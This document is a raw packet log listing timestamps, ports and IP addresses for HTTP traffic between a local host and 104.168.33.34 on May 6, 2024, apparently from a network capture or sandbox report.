May 6, 2024 14:59:20.060528040 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.060542107 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.060545921 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.060554981 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.060560942 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.060566902 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.060576916 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.060580015 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.060590982 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.060592890 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.060604095 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.060606956 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.060619116 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.060631037 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.060642004 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.061439991 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.062063932 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.062490940 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.062535048 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.063909054 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.211098909 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.211245060 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.211286068 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.211301088 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.211333990 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.211347103 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.211347103 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.211347103 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.211359978 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.211366892 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.211421013 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.211448908 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.211462975 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.211513996 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.212821960 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.212838888 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.212866068 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.212878942 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.212902069 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.212922096 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.212941885 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.212944984 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.212960958 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.212980032 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.213011026 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.213027954 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.213042021 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.213048935 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.213054895 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.213067055 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.213069916 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.213078022 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.213083029 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.213092089 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.213105917 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.213118076 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.213131905 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.213145018 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.213156939 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.213167906 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.213171005 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.213181973 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.213184118 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.213195086 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.213197947 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.213210106 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.213222980 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.213232994 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.213912964 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.214018106 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.214030981 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.214044094 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.214065075 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.214083910 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.214833021 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.214874029 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.214900017 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.214940071 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.214977026 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.215017080 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.215042114 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.215054989 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.215068102 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.215081930 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.215087891 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.215094090 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.215102911 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.215107918 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.215121031 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.215126991 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.215147018 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.215157986 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.215171099 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.215177059 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.215188026 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.215195894 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.215199947 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.215212107 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.215214014 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.215226889 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.215231895 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.215240002 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.215246916 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.215253115 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.215262890 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.215276957 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.215287924 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.215291023 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.215301037 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.215313911 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.215327978 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.215348005 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.215799093 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.216423035 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.216552019 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.216594934 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.217623949 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.365983009 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.366013050 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.366025925 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.366034985 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.366039038 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.366050959 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.366064072 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.366065979 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.366065979 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.366077900 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.366080046 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.366091013 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.366097927 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.366105080 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.366113901 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.366127014 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.366138935 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.368405104 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.368418932 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.368432045 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.368446112 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.368455887 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.368469954 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.368482113 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.368596077 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.368608952 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.368622065 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.368628025 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.368635893 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.368643045 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.368650913 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.368650913 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.368665934 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.368668079 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.368679047 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.368681908 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.368700027 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.368711948 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.368735075 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.368748903 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.368762016 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.368772984 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.368788004 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.368936062 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.368949890 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.368962049 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.368969917 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.368983030 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.368994951 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.369956970 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.369971991 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.369985104 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.369997978 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.370011091 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.370023012 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.370599985 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.370614052 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.370630980 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.370635033 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.370644093 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.370647907 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.370656967 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.370665073 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.370671034 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.370677948 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.370683908 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.370692015 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.370696068 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.370718956 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.370718956 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.370729923 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.370752096 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.370784998 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.371083975 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.371117115 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.371272087 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.371284962 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.371296883 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.371301889 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.371309996 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.371319056 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.371324062 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.371332884 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.371337891 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.371345043 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.371351957 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.371360064 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.371366024 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.371373892 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.371378899 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.371387959 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.371401072 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.371419907 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.371424913 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.371457100 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.372493029 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.372545958 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.374706030 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.518959999 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.518981934 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.518996954 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.519011021 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.519026995 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.519041061 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.519054890 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.519068956 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.519082069 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.519098043 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.519112110 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.519125938 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.519140959 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.519155979 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.519171000 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.519186020 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.519193888 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.519198895 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.519193888 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.519195080 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.519195080 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.519195080 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.519195080 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.519195080 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.519195080 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.519212961 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.519238949 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.519238949 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.519238949 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.519238949 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.519238949 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.519238949 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.519256115 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.521083117 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.521130085 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.521151066 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.521166086 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.521179914 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.521192074 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.521194935 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.521207094 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.521212101 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.521219015 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.521229029 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.521236897 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.521241903 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.521254063 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.521256924 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.521270037 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.521272898 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.521290064 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.521296024 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.521305084 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.521308899 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.521322012 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.521326065 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.521343946 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.521361113 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.521395922 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.521409035 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.521420002 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.521431923 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.521440029 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.521445036 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.521464109 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.521486044 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.521497965 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.521512032 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.521522999 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.521523952 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.521541119 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.521559000 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.521603107 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.521615982 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.521630049 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.521640062 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.521642923 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.521655083 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.521656990 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.521668911 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.521672010 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.521682978 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.521684885 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.521696091 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.521698952 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.521709919 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.521712065 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.521723032 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.521724939 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.521737099 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.521738052 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.521750927 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.521752119 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.521763086 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.521764994 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.521775961 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.521789074 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.521800041 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.522635937 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.522661924 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.522677898 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.522686958 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.522694111 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.522701979 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.522708893 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.522716045 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.522725105 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.522730112 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.522747993 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.522761106 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.523289919 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.523329020 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.523330927 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.523343086 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.523366928 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.523374081 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.523380995 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.523389101 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.523396015 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.523402929 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.523418903 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.523435116 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.523474932 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.523488045 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.523502111 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.523511887 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.523515940 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.523525953 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.523530960 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.523541927 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.523555994 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.523561954 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.523574114 CEST	80	49172	104.168.33.34	192.168.2.22
